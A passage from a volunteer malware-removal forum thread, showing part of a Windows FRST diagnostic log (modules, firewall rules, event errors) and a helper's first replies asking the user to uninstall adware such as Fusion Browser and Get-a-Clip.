2015-12-11 12:38 - 2015-12-08 16:36 - 00020816 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00109520 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 01737032 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00020808 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00020800 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_python_x66cf7a7cx17a72769.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00021840 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00038696 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\fastpath.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00024528 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32event.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00020936 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00114640 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32security.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00021320 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_pywin_kernel32_xde9e4433x360333f0.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00124880 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32file.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00030160 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00043472 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32process.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00175560 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32gui.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00028616 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32ts.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00024016 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00048592 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32service.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00024392 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00036296 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\librsync.dll
2015-12-11 12:38 - 2015-10-30 20:00 - 00024016 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32profile.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00117056 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00023376 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00134608 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_elementtree.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00134088 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00240584 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\jpegtran.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00020280 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00052024 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00021304 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Util.strxor.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00350152 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00084792 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2015-12-11 12:38 - 2015-12-08 16:36 - 01826608 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00083912 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\sip.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 03891504 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 01950000 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00519984 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00133936 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00225080 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00207672 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00024904 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00486704 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00357680 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2015-03-04 16:45 - 2015-10-30 20:01 - 00019920 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick.2\qtquick2plugin.dll
2015-03-04 16:45 - 2015-10-30 20:00 - 00786904 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-07-30 06:30 - 2015-10-30 20:00 - 00063448 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-03-04 16:45 - 2015-10-30 20:00 - 00019408 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Window.2\windowplugin.dll
2015-12-11 12:38 - 2015-10-30 20:00 - 00060880 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32print.pyd
2014-11-17 12:13 - 2014-11-17 12:13 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2011-03-01 22:14 - 2011-03-01 22:14 - 02143576 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2011-03-01 22:14 - 2011-03-01 22:14 - 07954776 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2011-03-01 22:15 - 2011-03-01 22:15 - 00340824 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2011-03-01 22:15 - 2011-03-01 22:15 - 00027480 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2011-03-01 22:15 - 2011-03-01 22:15 - 00126808 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2013-08-22 19:43 - 2013-08-22 19:43 - 00272688 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SBSDK.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00039216 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\HWR.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00053040 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SWR.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00057648 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\MWR.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00014848 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SessionNotification.node
2014-08-05 19:57 - 2013-12-10 10:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00113424 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00044304 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Common.Platform.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00010000 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.UpdateComponents.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00272656 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Business.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00022288 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.AvastWrapper.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00046864 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.adblocker.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00012560 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.SqlLite.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00120080 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.PUP.Management.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00036112 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.CSharp.Utilities.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 00121912 _____ () C:\Program Files (x86)\Get-a-Clip\Get-a-Clip.Config.dll
2016-01-10 11:56 - 2015-11-30 14:51 - 00201216 _____ () C:\Program Files\FusionBrowser\1.265.1\isa.dll
2016-01-10 11:56 - 2015-12-02 14:46 - 00858112 _____ () C:\Program Files\FusionBrowser\1.265.1\bl.dll
2016-01-10 11:56 - 2015-10-14 08:41 - 01481728 _____ () C:\Program Files\FusionBrowser\1.265.1\libglesv2.dll
2016-01-10 11:56 - 2015-10-14 08:41 - 00073728 _____ () C:\Program Files\FusionBrowser\1.265.1\libegl.dll
2016-01-10 11:56 - 2015-11-27 11:44 - 09596928 _____ () C:\Program Files\FusionBrowser\1.265.1\pdf.dll
2015-10-30 15:03 - 2015-09-01 07:25 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll
2015-12-16 18:24 - 2015-12-10 22:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 18:24 - 2015-12-10 22:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ () C:\Windows\SysWOW64\mfllib.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\webcompanion.com -> hxxp://webcompanion.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 209.18.47.61 - 209.18.47.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{E75569AE-50A8-44C1-A32F-AD23188C2CB6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7680980E-AFE8-4400-86BE-E8CB45B91F9C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6901D64F-8A7C-49ED-B599-379F31A1D079}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{86B23BAD-5055-406F-BB36-738D9FB3699C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [{DC77C6D1-D024-493B-8B75-410DF81A6358}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{7168F623-787A-4CDE-A5A4-438705AD2602}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{E6CA9AA2-23FF-41A8-AA49-38016672B113}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{63BAC35C-EE22-4B00-975D-F7795CFAD160}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{6C522205-C94A-4F4E-B895-3F416E04B44C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{471F6A8E-1FF9-49EF-847B-5C6B3CB3D12B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{0B1727FC-2FFC-4A3D-9AE4-6A32CB3F2753}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{A7B24D37-F84C-4EEF-A81E-6E88143D37BB}] => (Allow) C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hppiw.exe
FirewallRules: [{4FE76D1B-5775-4778-8125-56AA8D00B059}] => (Allow) C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hppiw.exe
FirewallRules: [{A882E021-2855-4880-849D-8CA9690D3D71}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\FaxApplications.exe
FirewallRules: [{AA3EA242-0AEB-4293-8779-68CA68858092}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\DigitalWizards.exe
FirewallRules: [{8971BE9B-6954-45D6-9570-61022EC543CE}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\SendAFax.exe
FirewallRules: [{45185B2D-FFEA-4CA7-BFEB-4B1F5DEA3392}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\DeviceSetup.exe
FirewallRules: [{7BE75A0B-473B-47E2-8495-A466A38D1DB3}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe
FirewallRules: [{8771921B-36F7-41CC-9BC1-1C3F09441BE4}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{AB51C4E2-4697-419D-94C9-D05F75F35E90}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{99E785A4-EE33-4BA9-B2EC-B9AE4AA232A7}] => (Allow) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{639DBDAE-AF66-45D9-8C19-28DD2B4CD3F1}] => (Allow) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{924914E8-9B73-4F52-A8EB-1974847A3A64}C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{C3C42EF4-E849-4E17-84FD-7C51B888F724}C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{4C865574-1791-467D-A39E-777F35B9BB5A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{9FBBACC0-771E-4247-82B3-97C554071FE3}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCGui.exe
FirewallRules: [{D9E6B306-441A-4561-88EA-2B45E29BDF17}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCGui.exe
FirewallRules: [{0D410DCC-E755-45B5-A0BA-15CF135860A1}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCService.exe
FirewallRules: [{B9D13898-08A4-4BE6-9030-81B80A9D1C96}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCService.exe
FirewallRules: [{9F760AEE-E28D-4246-85F6-D798DBD37D95}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTSNMPAgent.exe
FirewallRules: [{728DB316-43BE-4AC1-AE04-6E2D67FC6DD5}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTSNMPAgent.exe
FirewallRules: [{415E4BA5-28B9-4705-A0D2-FCC36C68F5B3}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{DFE46748-6EAE-40FB-A7EE-80588A78F708}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{DABE3CAF-D079-48DB-88B5-E315F1930A59}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{A66A3673-3901-4F0E-A931-CF762C470A52}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{83FECCAA-FC3E-4F60-9206-F5C7E977D0BA}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{46D0D44E-BBA0-43E7-9B59-91A072459763}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
25-12-2015 10:47:29 Scheduled Checkpoint
01-01-2016 11:46:28 Scheduled Checkpoint
01-01-2016 14:54:52 McAfee Vulnerability Scanner
09-01-2016 01:54:13 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices =============
 
Name: SMART Virtual TabletPC
Description: SMART Virtual TabletPC
Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Manufacturer: SMART Technologies ULC
Service: SMARTVTabletPCx64
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Officejet Pro 8600
Description: Officejet Pro 8600
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/10/2016 10:11:08 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
 
Error: (01/09/2016 10:57:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msn.exe, version: 11.50.44.1200, time stamp: 0x55cbe32e
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x74d9cb49
Faulting process id: 0x2cc8
Faulting application start time: 0xmsn.exe0
Faulting application path: msn.exe1
Faulting module path: msn.exe2
Report Id: msn.exe3
 
Error: (01/09/2016 09:26:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: OPBHOBrokerDsktop.exe, version: 8.0.1.11, time stamp: 0x5335c3d5
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000001bb2051ff41
Faulting process id: 0x11a8
Faulting application start time: 0xOPBHOBrokerDsktop.exe0
Faulting application path: OPBHOBrokerDsktop.exe1
Faulting module path: OPBHOBrokerDsktop.exe2
Report Id: OPBHOBrokerDsktop.exe3
 
Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 830580
 
Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 830580
 
Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998
 
Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998
 
Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/09/2016 05:21:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1188665
 
 
System errors:
=============
Error: (01/03/2016 05:58:32 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (01/03/2016 05:57:50 PM) (Source: Microsoft-Windows-WHEA-Logger) (EventID: 18) (User: NT AUTHORITY)
Description: A fatal hardware error has occurred.
 
Reported by component: Processor Core
Error Source: 3
Error Type: 9
Processor ID: 0
 
The details view of this entry contains further information.
 
Error: (01/02/2016 01:46:10 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.
 
Error: (01/02/2016 01:46:11 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (01/02/2016 01:46:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Search service failed to start due to the following error: 
%%1053
 
Error: (01/02/2016 01:46:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Search service to connect.
 
Error: (01/02/2016 01:46:01 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1053WSearch{9E175B6D-F52A-11D8-B9A5-505054503030}
 
Error: (01/02/2016 01:45:37 PM) (Source: Microsoft-Windows-WHEA-Logger) (EventID: 18) (User: NT AUTHORITY)
Description: A fatal hardware error has occurred.
 
Reported by component: Processor Core
Error Source: 3
Error Type: 9
Processor ID: 0
 
The details view of this entry contains further information.
 
Error: (01/02/2016 01:42:40 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}
 
Error: (01/02/2016 01:41:38 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {EC9100F8-5918-4F1B-9CC1-4D34A64E0FE0}
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4710HQ CPU @ 2.50GHz
Percentage of memory in use: 53%
Total physical RAM: 8126.3 MB
Available physical RAM: 3783.11 MB
Total Virtual: 16250.8 MB
Available Virtual: 11494.99 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:908.31 GB) (Free:819.22 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:22.9 GB) (Free:2.46 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 31772172)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=908.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=22.9 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=102 MB) - (Type=0C)
 
==================== End of Addition.txt ============================

 


  • 0

Advertisements


#2
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hello cmspears and :welcome:

My name is Bruce1270 and I will be helping you with your malware problem.

Please Note: I am still in training and my fixes have to be approved by my instructor so there may be a slight delay in my replies. Look upon it as a good thing though in that you have two people looking at your problem.

A few things before we get started.
  • Please read all instructions carefully. If there is anything you do not understand please ask me first before doing anything.
  • Please be patient. I am a volunteer who does this in my spare time so I will try to get back to you as soon as possible.
  • Please follow all instructions in the order given.
  • Please do not install any other software unless advised. This may hinder the removal process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • Please make sure you reply within 4 days to my responses, if there is no reply within 4 days, the topic will be closed and you will need to request the topic be reopened.


    Important!

    Please save or print off these instructions. Part of this fix may require you to be in safe mode where you will not be able to access the internet or my instructions!

    I would strongly recommend you back up your personal data and folders before we begin.

    Malware removal can be very long, complicated and may take multiple steps. I understand this may be frustrating but please stay with this topic until your machine is declared clean. The results will hopefully be very rewarding. :happy:
    As we go along please tell me how the computer is running now. Please be as descriptive as possible e.g. I'm still getting web redirects, I am unable to access the internet etc.

    OK. Let's move on.

    I'll need a little time to analyse the logs and will post back with further instructions.

  • 0

#3
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hi cmspears

Lets see if we can clean this up for you. :)


Step - Remove Programs

Please uninstall the following unwanted programs:
FromDocToPDF Internet Explorer Toolbar
Fusion Browser 1.265.1
One System Care
Get-a-Clip
